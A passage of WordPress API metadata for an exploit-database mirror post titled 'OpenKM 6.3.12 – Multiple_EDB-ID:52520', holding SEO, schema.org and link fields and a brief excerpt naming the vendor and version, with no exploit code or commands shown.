Labs Pvt. Ltd. Vendor Homepage: https:\/\/www.openkm.com\/ Software Link: https:\/\/hub.docker.com\/r\/openkm\/openkm-ce Version: OpenKM...","og_url":"https:\/\/zero.redgem.net\/?p=50100","og_site_name":"zero redgem","article_published_time":"2026-04-29T04:40:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50100#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50100"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"OpenKM 6.3.12 – Multiple_EDB-ID:52520","datePublished":"2026-04-29T04:40:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50100"},"wordCount":3063,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","exploitdb","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50100#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50100","url":"https:\/\/zero.redgem.net\/?p=50100","name":"OpenKM 6.3.12 - Multiple_EDB-ID:52520 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-29T04:40:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50100#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50100"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50100#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"OpenKM 6.3.12 – Multiple_EDB-ID:52520"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50100","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50100"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50100\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50100"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50100"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50100"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}